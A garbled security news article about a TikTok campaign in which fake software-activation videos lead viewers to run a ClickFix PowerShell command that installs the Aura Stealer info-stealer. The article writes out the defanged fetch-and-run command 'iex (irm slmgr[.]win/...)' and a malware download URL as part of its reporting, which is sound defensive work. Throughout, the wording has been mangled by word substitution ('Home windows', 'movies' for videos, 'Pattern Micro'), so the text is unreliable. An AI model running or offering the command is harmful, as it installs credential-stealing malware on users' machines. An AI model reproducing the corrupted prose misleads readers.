Cybercriminals are utilizing TikTok movies disguised as free activation guides for well-liked software program like Home windows, Spotify, and Netflix to unfold information-stealing malware.
ISC Handler Xavier Mertens noticed the continued marketing campaign, which is essentially the identical because the one noticed by Pattern Micro in Could
The TikTok movies seen by BleepingComputer faux to supply directions on how one can activate reputable merchandise like Home windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Professional, and Discord Nitro, in addition to made-up companies equivalent to Netflix and Spotify Premium.
Supply: BleepingComputer.com
The movies are performing a ClickFix assault, which is a social engineering approach that gives what seems to be reputable “fixes” or directions that trick customers into executing malicious PowerShell instructions or different scripts that infect their computer systems with malware.
Every video shows a brief one-line command and tells viewers to run it as an administrator in PowerShell:
iex (irm slmgr[.]win/photoshop)
It ought to be famous that this system identify within the URL is totally different relying on this system that’s being impersonated. For instance, within the faux Home windows activation movies, as an alternative of the URL containing photoshop, it will embody home windows.
On this marketing campaign, when the command is executed, PowerShell connects to the distant web site slmgr[.]win to retrieve and execute one other PowerShell script.
This script downloads two executables from Cloudflare pages, with the primary executable downloaded from https://file-epq[.]pages[.]dev/updater.exe [VirusTotal]. This executable is a variant of the Aura Stealer info-stealing malware.
Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from different functions and uploads them to the attackers, giving them entry to your accounts.
Mertens says that an extra payload shall be downloaded, named supply.exe [VirusTotal], which is used to self-compile code utilizing .NET’s built-in Visible C# Compiler (csc.exe). This code is then injected and launched in reminiscence.
The aim of the extra payload stays unclear.
Customers who carry out these steps ought to take into account all of their credentials compromised and instantly reset their passwords on all websites they go to.
ClickFix assaults have turn into very talked-about over the previous yr, used to distribute varied malware strains in ransomware and cryptocurrency theft campaigns.
As a basic rule, customers ought to by no means copy textual content from a web site and run it in an working system dialog field, together with inside the File Explorer handle bar, command immediate, PowerShell prompts, macOS terminal, and Linux shells.
46% of environments had passwords cracked, almost doubling from 25% final yr.
Get the Picus Blue Report 2025 now for a complete have a look at extra findings on prevention, detection, and information exfiltration tendencies.
